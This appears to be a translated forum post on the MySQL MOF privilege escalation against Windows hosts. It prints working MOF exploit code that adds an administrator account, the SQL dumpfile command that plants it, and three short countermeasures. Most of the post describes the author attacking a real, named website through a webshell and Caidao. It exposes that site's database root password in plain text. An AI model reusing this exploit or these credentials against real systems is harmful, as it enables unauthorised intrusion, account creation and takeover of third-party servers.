MySQL MOF extension vulnerability: prevention methods

Some exploit code published online:
#pragma namespace("\\\\.\\root\\subscription")
instance of __EventFilter as $EventFilter
{
    EventNamespace = "Root\\Cimv2";
    Name = "filtP2";
    Query = "Select * From __InstanceModificationEvent "
            "Where TargetInstance Isa \"Win32_LocalTime\" "
            "And TargetInstance.Second = 5";
    QueryLanguage = "WQL";
};
instance of ActiveScriptEventConsumer as $Consumer
{
    Name = "consPCSV2";
    ScriptingEngine = "JScript";
    ScriptText = "var WSH = new ActiveXObject(\"WScript.Shell\")\nWSH.run(\"net.exe user admin admin /add\")";
};
instance of __FilterToConsumerBinding
{
    Consumer = $Consumer;
    Filter = $EventFilter;
};
After connecting to the MySQL database, run: select load_file('C:\\RECYCLER\\nullevt.mof') into dumpfile 'c:/windows/system32/wbem/mof/nullevt.mof';

From the code above, the countermeasures follow:
1. MySQL user privilege control: deny functions such as "load_file" and "dumpfile"

2. Disable the "WScript.Shell" component

3. Directory permissions on c:/windows/system32/wbem/mof/: remove the built-in special group CREATOR OWNER
Of course, the above is what's said online. It feels like it needs a lot of privileges, e.g. root. Also, I ran into a remotely accessible MySQL yesterday, so I'll demo it for everyone.

Here's how it happened: a buddy asked a question on the forum, I took a look and found a big shot had already got in, saying it was done with MySQL MOF privilege escalation.

But this newbie had never heard of it, so I hurried off to look up materials and study... which is where the web content above came from.

Once I understood it, time to practice.
http://www.webbmw.com/config/config_ucenter.php (via a one-line webshell)

$_config['db']['1']['dbhost'] = 'localhost';
$_config['db']['1']['dbuser'] = 'root';
$_config['db']['1']['dbpw'] = 'tfr226206';
$_config['db']['1']['dbcharset'] = 'gbk';
$_config['db']['1']['pconnect'] = '0';
$_config['db']['1']['dbname'] = 'webbmw';
$_config['db']['1']['tablepre'] = 'pre_';
$_config['db']['common']['slave_except_table'] = '';

There's the root password.
So I went straight at it with Caidao.

Upload the shell first.

Since we had those accounts and such, let's run it.......

A small note:

The first execution here didn't succeed; reason unknown.

I guessed it might be that the code we ran had a problem, so I went and got the code I had found on wooyun.
#pragma namespace("\\\\.\\root\\subscription")
instance of __EventFilter as $EventFilter
{
    EventNamespace = "Root\\Cimv2";
    Name = "filtP2";
    Query = "Select * From __InstanceModificationEvent "
            "Where TargetInstance Isa \"Win32_LocalTime\" "
            "And TargetInstance.Second = 5";
    QueryLanguage = "WQL";
};
instance of ActiveScriptEventConsumer as $Consumer
{
    Name = "consPCSV2";
    ScriptingEngine = "JScript";
    ScriptText = "var WSH = new ActiveXObject(\"WScript.Shell\")\nWSH.run(\"net.exe user test test /add\")";
};
instance of __FilterToConsumerBinding
{
    Consumer = $Consumer;
    Filter = $EventFilter;
};
I put the file at C:\WINDOWS\temp\1.mof

So we change the executed statement accordingly:

select load_file('C:\\WINDOWS\\temp\\1.mof') into dumpfile 'c:/windows/system32/wbem/mof/nullevt.mof';

But you'll find the account still isn't sitting there..

So I was getting frustrated.

I went and ran it one database at a time, and when I got to the second one, mysql, it succeeded.........

But it didn't work in any of the other databases...

I'm quite puzzled. Why doesn't it work? Asking a big shot to explain...